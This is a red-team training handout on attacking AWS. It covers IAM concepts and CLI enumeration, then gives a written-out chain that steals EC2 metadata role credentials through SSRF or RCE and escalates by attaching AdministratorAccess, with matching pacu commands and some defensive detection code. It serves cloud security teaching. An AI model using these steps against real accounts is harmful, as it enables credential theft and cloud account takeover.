Multi-Cloud Red Team Analyst (MCRTA) : AWS
© All Rights Reserved CyberWarFare Labs
Red Teaming in AWS Cloud Environment
1. Introduction to AWS Cloud
2. Authentication Methods
3. CLI Based Enumeration
4. Red Team Ops in AWS Cloud
1. Introduction to AWS Cloud
1.1 AWS Cloud Architecture
[Diagram: the End User reaches AWS through the Web Client (AWS Web Portal, GUI) or through the AWS CLI and SDK/API (AWS Services). Other labels: Cloud Space, Compute, Storage, Control Plane, Data Plane.]
Credentials shown in the diagram:
• IAM Username & Password
• SSO Username & Password
• Long Term Key : Access Key ID & Secret
• Short Term Key : Access Key ID & Secret & Token
1.2 AWS Cloud Services :
[Diagram: AWS services by category: Compute (EC2, Lambda, ECS|EKS), Networking (VPC), Identity Access Management (IAM, SSO), Security (CloudTrail, CloudWatch, GuardDuty), Storage (EBS, S3, RDS).]
1.3 Identity and Access Management
IAM :
➤ AWS Identity and Access Management (IAM) enables you to manage access to AWS services
and resources securely.
➤ IAM allows you to create and manage AWS users and groups and use permissions to allow
and deny their access to AWS resources.
AWS IAM allows you to:
1. Manage IAM users, groups and their access.
2. Manage IAM roles and their permissions.
3. Manage federated users and their permissions.
[Diagram: IAM contains Users, Groups and Roles. A Policy is attached to Users, to Groups and to Roles; a Role is attached to AWS Services. A Policy contains Permissions: Effect, Actions, Resources.]
A. Users
➤ An AWS Identity and Access Management (IAM) user is an entity that you create in AWS to
represent the person or application that uses it to interact with AWS.
➤ A user in AWS consists of a name and credentials.
B. Groups
➤ An IAM group is a collection of IAM users. Groups let you specify permissions for multiple
users, which can make it easier to manage the permissions for those users.
C. Roles
➤ An IAM role is an IAM entity that defines a set of permissions for making AWS service requests.
➤ IAM roles are associated with AWS services such as EC2, RDS etc.
Role for EC2 services
[Diagram: an IAM Role with full permission is attached to an EC2 instance, so the EC2 instance can access the S3 bucket.]
The IAM role names EC2 as its trusted entity, so the EC2 instance can assume this role.
D. Policies
➤ IAM policies define permissions for an action regardless of the method used to perform the operation.
➤ For example, if a policy allows the GetUser action, then a user with that policy can get user
information from the AWS Management Console, the AWS CLI, or the AWS API.
➤ Policies can be attached to IAM identities (users, groups or roles) or AWS resources.
Policy Data :
➤ Effect - Used to Allow or Deny access
➤ Action - Include a list of actions (Get, Put, Delete) that the policy allows or denies.
➤ Resource - A list of resources to which the actions apply
Policy types:
➤ Inline Policies - An inline policy is a policy that's embedded in an IAM identity (a
user, group, or role)
➤ Managed Policies -
■ AWS Managed Policies
■ Customer Managed Policies
2. Authentication Methods
2.1 AWS Cloud Authentication :
Credentials
➤ Long Term Credential
■ Graphical User Interface (GUI) : IAM Username & Password, SSO Username & Password
■ Programmatic Interface (CLI/SDK) : Access Key ID, Secret Access Key
➤ Short Term Credential
■ Programmatic Interface (CLI/SDK) : Access Key ID, Secret Access Key, Session Token
2.1.1 Authentication to AWS Management Portal
➤ IAM Root User’s credential [Username + Password] - Long Term Access
➤ IAM User’s credential [Username + Password] - Long Term Access
➤ SSO User’s credential [Username + Password] - Long Term Access
➤ IAM Root User’s credential [Username + Password]:
https://console.aws.amazon.com/
➤ IAM User’s credential [Username + Password]:
https://console.aws.amazon.com/
➤ SSO User’s credential [Username + Password]:
https://Org-Name.awsapps.com/start
2.1.2 Authentication to AWS using AWS CLI
➤ Long Term : Access Key ID + Access Key Secret
➤ Short Term : Access Key ID + Access Key Secret + Session Token
Programmatic Access ( Access Key ID + Access Key Secret )
aws configure --profile atomic-nuclear
Get the information about configured identity
aws sts get-caller-identity --profile atomic-nuclear
Programmatic Access ( Access Key ID + Access Key Secret + Session Token )
aws configure
Get the information about configured identity
aws sts get-caller-identity --profile atomic-nuclear
AWS CLI Stored Credentials
Windows
C:\Users\UserName\.aws
Linux
/home/UserName/.aws
Content of credentials file
cat credentials
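An added example, not part of the original slides: an audit of a credentials file that separates long-term from short-term profiles, since long-term keys left on disk never expire. The sample file content is constructed with fake values; it relies on the AWS key ID prefixes AKIA (long-term) and ASIA (temporary).

```python
import configparser

# Constructed sample of a ~/.aws/credentials file; all key values are fake.
SAMPLE = """\
[atomic-nuclear]
aws_access_key_id = AKIAEXAMPLEEXAMPLE00
aws_secret_access_key = constructedSecretValue0000000000000000
[ec2]
aws_access_key_id = ASIAEXAMPLEEXAMPLE00
aws_secret_access_key = constructedSecretValue1111111111111111
aws_session_token = constructedTokenValue
[broken]
aws_access_key_id = ASIAEXAMPLEEXAMPLE01
aws_secret_access_key = constructedSecretValue2222222222222222
"""

def classify_profiles(text):
    """Map each profile name to 'long-term', 'short-term' or 'inconsistent'."""
    parser = configparser.ConfigParser(interpolation=None)  # values may contain '%'
    parser.read_string(text)
    result = {}
    for profile in parser.sections():
        key_id = parser.get(profile, "aws_access_key_id", fallback="")
        has_token = bool(parser.get(profile, "aws_session_token", fallback=""))
        if key_id.startswith("AKIA") and not has_token:
            result[profile] = "long-term"      # valid until rotated or deleted
        elif key_id.startswith("ASIA") and has_token:
            result[profile] = "short-term"     # expires with the session
        else:
            result[profile] = "inconsistent"   # e.g. temporary key without its token
    return result

def long_term_profiles(text):
    """Profiles holding keys that stay valid until someone rotates them."""
    return sorted(p for p, kind in classify_profiles(text).items() if kind == "long-term")

if __name__ == "__main__":
    for name, kind in classify_profiles(SAMPLE).items():
        print(f"{name}: {kind}")
```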
3. CLI Based Enumeration
2.1.3 Enumeration
Users:
List of IAM Users :
aws iam list-users
List the IAM groups that the specified IAM user belongs to :
aws iam list-groups-for-user --user-name [user-name]
List all managed policies that are attached to the specified IAM user :
aws iam list-attached-user-policies --user-name [user-name]
Lists the names of the inline policies embedded in the specified IAM user :
aws iam list-user-policies --user-name [user-name]
Groups :
List of IAM Groups :
aws iam list-groups
List of all users in a group :
aws iam get-group --group-name [group-name]
Lists all managed policies that are attached to the specified IAM Group :
aws iam list-attached-group-policies --group-name [group-name]
List the names of the inline policies embedded in the specified IAM Group:
aws iam list-group-policies --group-name [group-name]
Roles :
List of IAM Roles :
aws iam list-roles
Lists all managed policies that are attached to the specified IAM role :
aws iam list-attached-role-policies --role-name [role-name]
List the names of the inline policies embedded in the specified IAM role :
aws iam list-role-policies --role-name [role-name]
Policies:
List of all IAM policies :
aws iam list-policies
Retrieves information about the specified managed policy :
aws iam get-policy --policy-arn [policy-arn]
Lists information about the versions of the specified managed policy :
aws iam list-policy-versions --policy-arn [policy-arn]
Retrieves information about the specified version of the specified managed policy :
aws iam get-policy-version --policy-arn [policy-arn] --version-id [version-id]
Retrieves the specified inline policy document that is embedded in the specified IAM user / group / role :
aws iam get-user-policy --user-name [user-name] --policy-name [policy-name]
aws iam get-group-policy --group-name [group-name] --policy-name [policy-name]
aws iam get-role-policy --role-name [role-name] --policy-name [policy-name]
4. Red Team Ops in AWS Cloud
Cloud Red Team Attack Life Cycle
Configure Initial Compromised User Credential :
aws configure --profile auditor
Enumerate Cloud Services, e.g. EC2, S3 etc., in an Organization AWS Account :
aws ec2 describe-instances --profile auditor
Exploit Public Facing Application Running on EC2 Instance and Retrieve Temporary Credential :
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/jump-ec2-role
Note: Cloud metadata can be retrieved by exploiting these web app vulnerabilities:
● SSRF
● RCE
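A defender's check for the exposure this step relies on, as an added example that is not from the original slides: the plain GET above is a token-less IMDSv1 request, which an instance answers only while its metadata option HttpTokens is "optional". The describe-instances excerpt is constructed, with fake instance IDs and account ID.

```python
import json

# Constructed excerpt of `aws ec2 describe-instances` output; IDs and ARNs are fake.
SAMPLE = json.loads("""
{"Reservations": [{"Instances": [
  {"InstanceId": "i-0aaaaaaaaaaaaaaa1",
   "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional"}},
  {"InstanceId": "i-0bbbbbbbbbbbbbbb2",
   "IamInstanceProfile": {"Arn": "arn:aws:iam::111122223333:instance-profile/jump-ec2-role"},
   "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional"}},
  {"InstanceId": "i-0ccccccccccccccc3",
   "IamInstanceProfile": {"Arn": "arn:aws:iam::111122223333:instance-profile/app-role"},
   "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required"}},
  {"InstanceId": "i-0ddddddddddddddd4",
   "MetadataOptions": {"HttpEndpoint": "disabled", "HttpTokens": "optional"}}
]}]}
""")

def imdsv1_instances(output):
    """Return (instance_id, instance_profile_arn) for instances that still answer
    token-less IMDSv1 requests, those with a role attached first."""
    findings = []
    for reservation in output.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            opts = inst.get("MetadataOptions", {})
            if opts.get("HttpEndpoint") == "disabled":
                continue  # metadata service switched off entirely
            if opts.get("HttpTokens") == "required":
                continue  # IMDSv2 only: a plain GET without a session token is rejected
            arn = inst.get("IamInstanceProfile", {}).get("Arn")
            findings.append((inst["InstanceId"], arn))
    # An attached role means role credentials are served by the metadata service
    return sorted(findings, key=lambda f: f[1] is None)

if __name__ == "__main__":
    for instance_id, arn in imdsv1_instances(SAMPLE):
        print(instance_id, arn or "(no role attached)")
```

Requiring IMDSv2 stops a GET-only SSRF from reading the credentials; it does not help once an attacker has code execution on the instance.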
Configure & Validate Temporary Credential in AWS CLI :
aws configure set aws_access_key_id [key-id] --profile ec2
aws configure set aws_secret_access_key [secret-key] --profile ec2
aws configure set aws_session_token [token] --profile ec2
aws sts get-caller-identity --profile ec2
Get the Managed Policy Attached to EC2 Instance :
aws iam list-attached-role-policies --role-name jump-ec2-role --profile auditor
List the names of the inline policies embedded in the EC2 instance role :
aws iam list-role-policies --role-name jump-ec2-role --profile auditor
Get the permissions in inline policy :
aws iam get-role-policy --role-name jump-ec2-role --policy-name jump-inline-policy --profile auditor
Escalate privilege by attaching administrator policy to itself :
aws iam attach-role-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --role-name jump-ec2-role --profile ec2
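The escalation above works only if the role's own policy allows it to attach policies to itself. As an added example (not from the original slides), this review check flags that condition in a policy document before it is deployed. The policy documents and account ID are constructed, since the slides do not show the content of jump-inline-policy, and the check assumes plain Allow statements (it ignores Deny, NotAction and Condition).

```python
import json
from fnmatch import fnmatchcase

ROLE_ARN = "arn:aws:iam::111122223333:role/jump-ec2-role"  # constructed account ID

# Constructed policy documents for illustration.
RISKY = json.loads("""{"Version": "2012-10-17", "Statement": [
  {"Effect": "Allow", "Action": ["iam:Attach*", "s3:GetObject"], "Resource": "*"}]}""")
SCOPED = json.loads("""{"Version": "2012-10-17", "Statement":
  {"Effect": "Allow", "Action": "iam:AttachRolePolicy",
   "Resource": "arn:aws:iam::111122223333:role/app-*"}}""")

# IAM write actions that let a role change its own permissions
SELF_ESCALATION_ACTIONS = ("iam:AttachRolePolicy", "iam:PutRolePolicy")

def as_list(value):
    """IAM allows a single item where a list is expected."""
    return value if isinstance(value, list) else [value]

def self_escalation_actions(policy, role_arn):
    """Return the escalation actions this policy allows on role_arn itself."""
    hits = set()
    for stmt in as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or "Action" not in stmt:
            continue
        # The statement matters only if its Resource covers the role's own ARN
        if not any(fnmatchcase(role_arn, r) for r in as_list(stmt.get("Resource", []))):
            continue
        for pattern in as_list(stmt["Action"]):
            for action in SELF_ESCALATION_ACTIONS:
                # Action names are case-insensitive; '*' and '?' are wildcards
                if fnmatchcase(action.lower(), pattern.lower()):
                    hits.add(action)
    return sorted(hits)

if __name__ == "__main__":
    print("risky :", self_escalation_actions(RISKY, ROLE_ARN))
    print("scoped:", self_escalation_actions(SCOPED, ROLE_ARN))
```

A non-empty result means the role can rewrite its own permissions; scoping Resource away from the role's own ARN or dropping the action removes the path.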
Again, check the managed Policy Attached to EC2 Instance :
aws iam list-attached-role-policies --role-name jump-ec2-role --profile auditor
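The attach call above is recorded by CloudTrail as an AttachRolePolicy management event. As an added example (not from the original slides), this detection flags the two signals in this scenario: a role session attaching a policy to its own role, and AdministratorAccess being attached. The records are constructed and trimmed to the fields the check reads; role and user names other than jump-ec2-role are hypothetical.

```python
ADMIN_ARN = "arn:aws:iam::aws:policy/AdministratorAccess"

def session(role):
    """userIdentity of a session running under `role` (constructed, trimmed)."""
    return {"type": "AssumedRole",
            "sessionContext": {"sessionIssuer": {"type": "Role", "userName": role}}}

# Constructed CloudTrail records, trimmed to the fields the check reads.
EVENTS = [
    {"eventSource": "iam.amazonaws.com", "eventName": "ListAttachedRolePolicies",
     "userIdentity": {"type": "IAMUser", "userName": "auditor"},
     "requestParameters": {"roleName": "jump-ec2-role"}},
    {"eventSource": "iam.amazonaws.com", "eventName": "AttachRolePolicy",
     "userIdentity": session("jump-ec2-role"),
     "requestParameters": {"roleName": "jump-ec2-role", "policyArn": ADMIN_ARN}},
    {"eventSource": "iam.amazonaws.com", "eventName": "AttachRolePolicy",
     "userIdentity": session("deploy-role"),
     "requestParameters": {"roleName": "app-role",
                           "policyArn": "arn:aws:iam::aws:policy/ReadOnlyAccess"}},
    {"eventSource": "iam.amazonaws.com", "eventName": "AttachRolePolicy",
     "userIdentity": {"type": "IAMUser", "userName": "admin"},
     "requestParameters": {"roleName": "app-role", "policyArn": ADMIN_ARN}},
]

def detect_role_escalation(events):
    """Return (role, reasons) for AttachRolePolicy calls worth an alert."""
    alerts = []
    for ev in events:
        if (ev.get("eventSource"), ev.get("eventName")) != ("iam.amazonaws.com", "AttachRolePolicy"):
            continue
        params = ev.get("requestParameters") or {}
        ident = ev.get("userIdentity") or {}
        issuer = ident.get("sessionContext", {}).get("sessionIssuer", {}).get("userName")
        reasons = []
        if ident.get("type") == "AssumedRole" and issuer == params.get("roleName"):
            reasons.append("role changed its own permissions")
        if params.get("policyArn") == ADMIN_ARN:
            reasons.append("AdministratorAccess attached")
        if reasons:
            alerts.append((params.get("roleName"), reasons))
    return alerts

if __name__ == "__main__":
    for role, reasons in detect_role_escalation(EVENTS):
        print(role, "->", "; ".join(reasons))
```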
Red Team Ops with Automated Tool “pacu” :
Setting the initial user access key in pacu
set_keys
Get the permission of current logged-in user
exec iam__enum_permissions
whoami
Enumerate EC2 instances and get the public IP addresses.
exec ec2__enum
data EC2
Set the temporary credential for role attached to ec2 instance.
set_keys
Get the permission of current logged-in role.
exec iam__enum_permissions
whoami
Enumerate privilege escalation permission and exploit it.
exec iam__privesc_scan
Again, check the permission of privilege escalated role.
exec iam__enum_permissions
whoami